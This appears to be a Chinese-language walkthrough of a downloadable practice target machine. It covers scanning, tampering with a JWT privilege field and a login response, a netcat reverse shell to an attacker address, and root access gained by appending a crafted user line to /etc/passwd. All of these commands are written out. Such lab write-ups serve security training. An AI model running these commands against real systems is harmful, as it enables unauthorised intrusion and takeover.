目录
靶机下载地址:
链接:https://pan.baidu.com/s/1gkRoi0WF-qkV2rtw7bDb0w
提取码:aqhu
一、主机发现
方法1 namp
nmap -sn 192.168.106.0/24
方法二 netdiscover
主动:netdiscover -i eth0 -r 192.168.106.0/24
二、端口扫描(masscan/nmap)
masscan --rate=10000 --ports 0-65535 192.168.106.132
发包数默认为100个
三、端口服务 服务确认
nmap -sV -T4 -O -p 8080,23,80 IP
-sV服务版本 -T4速度(最高为5,推荐用4) -O系统 -p 指定端口
nmap -T4 -sV -O -p 80 192.168.106.132
开启了80(http)端口 操作系统 Liunx3.X/4.X
四、扫描子域名
dirb http://192.168.106.132
访问192.168.106.132
进入页面找到登录和注册
登录可尝试弱口令,万能密码,sql注入,xss
这里不能注册 检查页面
在源码中搜索关键字register
找到了注册所需数据
发现了类似注册的url
可以尝试使用burp suite来注册一个用户
注册成功
更改用户名
存在 横向越权
水平越权漏洞,可以查看是否有垂直越权
发现auth_ level参数 猜测可能与账号权限有关
登录https://jwt.io/ 解码
在源码中搜索auth_level关键字
auth_leve
将auth_level字段改为master_admin_user加密,然后放入原来包中
替换回包
多了个Admin按钮,此为管理员界面
再抓一个登录包
将回报的success值改为true
显示登录成功,存在逻辑漏洞
五、抓包,反弹shell
Kali监听443端口
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.10.152 443 > /tmp/f;
拿到shell
六、提权
python -c 'import pty; pty.spawn("/bin/bash")'
对密码进行加密(aa属于盐值相当于加密后字符串的前缀)
perl -le 'print crypt("123456","aa")'
echo 'yyqx:aaAN1ZUwjW7to:0:0:yyqx:/root:/bin/bash' >> /etc/passwd
在/etc/passwd中添加一行自己的用户
提权成功
学习更多安全知识,请关注vx公众号“安全狐”